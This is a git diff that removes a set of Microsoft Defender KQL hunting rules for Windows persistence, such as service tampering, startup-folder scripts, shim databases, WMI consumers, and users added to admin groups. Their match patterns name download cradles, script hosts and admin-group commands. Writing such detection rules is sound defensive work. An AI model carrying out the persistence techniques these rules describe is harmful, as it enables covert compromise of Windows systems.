diff --git a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql b/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
deleted file mode 100644
index ccf4a3ab..00000000
--- a/Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/18
-// Level: high
-// Description: Detects suspicious DACL modifications via the "Set-Service" cmdlet using the "SecurityDescriptorSddl" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable
-// Tags: attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\pwsh.exe" or ProcessVersionInfoOriginalFileName =~ "pwsh.dll") and (ProcessCommandLine contains "-SecurityDescriptorSddl " or ProcessCommandLine contains "-sd ") and ((ProcessCommandLine contains ";;;IU" or ProcessCommandLine contains ";;;SU" or ProcessCommandLine contains ";;;BA" or ProcessCommandLine contains ";;;SY" or ProcessCommandLine contains ";;;WD") and (ProcessCommandLine contains "Set-Service " and ProcessCommandLine contains "D;;"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Service_Path_Modification.kql b/Persistence/Suspicious_Service_Path_Modification.kql
deleted file mode 100644
index f0c3811c..00000000
--- a/Persistence/Suspicious_Service_Path_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/21
-// Level: high
-// Description: Detects service path modification via the "sc" binary to a suspicious command or path
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql b/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
deleted file mode 100644
index a6b5d758..00000000
--- a/Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql b/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
deleted file mode 100644
index 1df15c46..00000000
--- a/Persistence/Suspicious_Shim_Database_Patching_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: high
-// Description: Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.
-// Tags: attack.persistence, attack.t1546.011
-DeviceRegistryEvents
-| where RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom" and (RegistryKey endswith "\\csrss.exe" or RegistryKey endswith "\\dllhost.exe" or RegistryKey endswith "\\explorer.exe" or RegistryKey endswith "\\RuntimeBroker.exe" or RegistryKey endswith "\\services.exe" or RegistryKey endswith "\\sihost.exe" or RegistryKey endswith "\\svchost.exe" or RegistryKey endswith "\\taskhostw.exe" or RegistryKey endswith "\\winlogon.exe" or RegistryKey endswith "\\WmiPrvSe.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Startup_Folder_Persistence.kql b/Persistence/Suspicious_Startup_Folder_Persistence.kql
deleted file mode 100644
index b30c57ba..00000000
--- a/Persistence/Suspicious_Startup_Folder_Persistence.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects when a file with a suspicious extension is created in the startup folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where FolderPath contains "\\Windows\\Start Menu\\Programs\\Startup\\" and (FolderPath endswith ".vbs" or FolderPath endswith ".vbe" or FolderPath endswith ".bat" or FolderPath endswith ".ps1" or FolderPath endswith ".hta" or FolderPath endswith ".dll" or FolderPath endswith ".jar" or FolderPath endswith ".msi" or FolderPath endswith ".scr" or FolderPath endswith ".cmd")
\ No newline at end of file
diff --git a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql b/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
deleted file mode 100644
index 04afff03..00000000
--- a/Persistence/Suspicious_WindowsTerminal_Child_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/25
-// Level: medium
-// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)
-// Tags: attack.execution, attack.persistence
-DeviceProcessEvents
-| where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat"))))
\ No newline at end of file
diff --git a/Persistence/Suspicious_desktop.ini_Action.kql b/Persistence/Suspicious_desktop.ini_Action.kql
deleted file mode 100644
index 7c92db8d..00000000
--- a/Persistence/Suspicious_desktop.ini_Action.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)
-// Date: 2020/03/19
-// Level: medium
-// Description: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
-// Tags: attack.persistence, attack.t1547.009
-DeviceFileEvents
-| where FolderPath endswith "\\desktop.ini" and (not(((InitiatingProcessFolderPath startswith "C:\\Windows\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe" and FolderPath contains "\\JetBrains\\apps\\") or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsService_Execution.kql b/Persistence/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Persistence/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Persistence/Sysinternals_PsSuspend_Execution.kql b/Persistence/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Persistence/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Persistence/System_Scripts_Autorun_Keys_Modification.kql b/Persistence/System_Scripts_Autorun_Keys_Modification.kql
deleted file mode 100644
index a6f88a0b..00000000
--- a/Persistence/System_Scripts_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Software\\Policies\\Microsoft\\Windows\\System\\Scripts" and (RegistryKey contains "\\Startup" or RegistryKey contains "\\Shutdown" or RegistryKey contains "\\Logon" or RegistryKey contains "\\Logoff") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Tasks_Folder_Evasion.kql b/Persistence/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Persistence/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Persistence/Third_Party_Software_DLL_Sideloading.kql b/Persistence/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Persistence/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Persistence/UAC_Bypass_With_Fake_DLL.kql b/Persistence/UAC_Bypass_With_Fake_DLL.kql
deleted file mode 100644
index ea6ebd96..00000000
--- a/Persistence/UAC_Bypass_With_Fake_DLL.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Dmitry Uchakin
-// Date: 2020/10/06
-// Level: high
-// Description: Attempts to load dismcore.dll after dropping it
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
deleted file mode 100644
index b24cd1fc..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceFileEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql b/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
deleted file mode 100644
index dba934a8..00000000
--- a/Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/18
-// Level: high
-// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section
-// Tags: attack.persistence, attack.defense_evasion, attack.t1542.001
-DeviceProcessEvents
-| where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe"
\ No newline at end of file
diff --git a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql b/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
deleted file mode 100644
index 6f462ae1..00000000
--- a/Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/01
-// Level: medium
-// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe.
-Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or isnull(ProcessCommandLine) or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg"))))
\ No newline at end of file
diff --git a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql b/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
deleted file mode 100644
index 63e818d3..00000000
--- a/Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2022/07/15
-// Level: high
-// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.t1053.005
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00")
\ No newline at end of file
diff --git a/Persistence/Uncommon_Userinit_Child_Process.kql b/Persistence/Uncommon_Userinit_Child_Process.kql
deleted file mode 100644
index 6b52304c..00000000
--- a/Persistence/Uncommon_Userinit_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tom Ueltschi (@c_APT_ure), Tim Shelton
-// Date: 2019/01/12
-// Level: high
-// Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
-// Tags: attack.t1037.001, attack.persistence
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\userinit.exe" and (not(FolderPath endswith ":\\WINDOWS\\explorer.exe")) and (not(((FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files (x86)\\Citrix\\System32\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\cmstart.exe" or FolderPath endswith ":\\Program Files\\Citrix\\HDX\\bin\\icast.exe" or FolderPath endswith ":\\Program Files\\Citrix\\System32\\icast.exe") or isnull(FolderPath) or (ProcessCommandLine contains "netlogon.bat" or ProcessCommandLine contains "UsrLogon.cmd") or (FolderPath endswith ":\\Windows\\System32\\proquota.exe" or FolderPath endswith ":\\Windows\\SysWOW64\\proquota.exe") or ProcessCommandLine =~ "PowerShell.exe")))
\ No newline at end of file
diff --git a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql b/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
deleted file mode 100644
index 61f33107..00000000
--- a/Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/31
-// Level: medium
-// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
-// Tags: attack.persistence, attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Persistence/User_Added_To_Highly_Privileged_Group.kql b/Persistence/User_Added_To_Highly_Privileged_Group.kql
deleted file mode 100644
index 5ffd354c..00000000
--- a/Persistence/User_Added_To_Highly_Privileged_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/23
-// Level: high
-// Description: Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Group Policy Creator Owners" or ProcessCommandLine contains "Schema Admins") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Local_Administrators_Group.kql b/Persistence/User_Added_to_Local_Administrators_Group.kql
deleted file mode 100644
index 7cd2e84d..00000000
--- a/Persistence/User_Added_to_Local_Administrators_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/12
-// Level: medium
-// Description: Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.t1098
-DeviceProcessEvents
-| where (ProcessCommandLine contains " administrators " or ProcessCommandLine contains " administrateur") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql b/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
deleted file mode 100644
index b8bb4681..00000000
--- a/Persistence/User_Added_to_Remote_Desktop_Users_Group.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// Tags: attack.persistence, attack.lateral_movement, attack.t1133, attack.t1136.001, attack.t1021.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/Persistence/VBScript_Payload_Stored_in_Registry.kql b/Persistence/VBScript_Payload_Stored_in_Registry.kql
deleted file mode 100644
index 9973f4c1..00000000
--- a/Persistence/VBScript_Payload_Stored_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/03/05
-// Level: high
-// Description: Detects VBScript content stored into registry keys as seen being used by UNC2452 group
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where ((RegistryValueData contains "vbscript:" or RegistryValueData contains "jscript:" or RegistryValueData contains "mshtml," or RegistryValueData contains "RunHTMLApplication" or RegistryValueData contains "Execute(" or RegistryValueData contains "CreateObject" or RegistryValueData contains "window.close") and RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion") and (not((RegistryKey contains "Software\\Microsoft\\Windows\\CurrentVersion\\Run" or ((RegistryValueData contains "\\Microsoft.NET\\Primary Interop Assemblies\\Microsoft.mshtml.dll" or RegistryValueData contains "<\\Microsoft.mshtml,fileVersion=" or RegistryValueData contains "_mshtml_dll_" or RegistryValueData contains "<\\Microsoft.mshtml,culture=") and InitiatingProcessFolderPath endswith "\\msiexec.exe" and RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData"))))
\ No newline at end of file
diff --git a/Persistence/VMToolsd_Suspicious_Child_Process.kql b/Persistence/VMToolsd_Suspicious_Child_Process.kql
deleted file mode 100644
index fcf64329..00000000
--- a/Persistence/VMToolsd_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: bohops, Bhabesh Raj
-// Date: 2021/10/08
-// Level: high
-// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe"))))
\ No newline at end of file
diff --git a/Persistence/VsCode_Powershell_Profile_Modification.kql b/Persistence/VsCode_Powershell_Profile_Modification.kql
deleted file mode 100644
index 6d500082..00000000
--- a/Persistence/VsCode_Powershell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/24
-// Level: medium
-// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.VSCode_profile.ps1"
\ No newline at end of file
diff --git a/Persistence/WINEKEY_Registry_Modification.kql b/Persistence/WINEKEY_Registry_Modification.kql
deleted file mode 100644
index 40b59710..00000000
--- a/Persistence/WINEKEY_Registry_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72
-// Date: 2020/10/30
-// Level: high
-// Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
-// Tags: attack.persistence, attack.t1547
-DeviceRegistryEvents
-| where RegistryKey endswith "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Backup Mgr"
\ No newline at end of file
diff --git a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql b/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
deleted file mode 100644
index 3f40bc3a..00000000
--- a/Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/09/02
-// Level: medium
-// Description: Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity.
-// Tags: attack.lateral_movement, attack.privilege_escalation, attack.persistence, attack.t1546.003
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\vbscript.dll" or FolderPath endswith "\\wbemdisp.dll" or FolderPath endswith "\\wshom.ocx" or FolderPath endswith "\\scrrun.dll") and InitiatingProcessFolderPath endswith "\\scrcons.exe"
\ No newline at end of file
diff --git a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql b/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
deleted file mode 100644
index 653e625e..00000000
--- a/Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/11
-// Level: critical
-// Description: Detects a WMI backdoor in Exchange Transport Agents via WMI event filters
-// Tags: attack.persistence, attack.t1546.003
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\EdgeTransport.exe" and (not((FolderPath =~ "C:\\Windows\\System32\\conhost.exe" or (FolderPath endswith "\\Bin\\OleConverter.exe" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\"))))
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
deleted file mode 100644
index 90563eab..00000000
--- a/Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
-// Level: high
-// Description: Detects WMI command line event consumers
-// Tags: attack.t1546.003, attack.persistence
-DeviceImageLoadEvents
-| where InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe" and FolderPath endswith "\\wbemcons.dll"
\ No newline at end of file
diff --git a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql b/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
deleted file mode 100644
index 36c7415d..00000000
--- a/Persistence/WMI_Persistence_-_Script_Event_Consumer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Thomas Patzke
-// Date: 2018/03/07
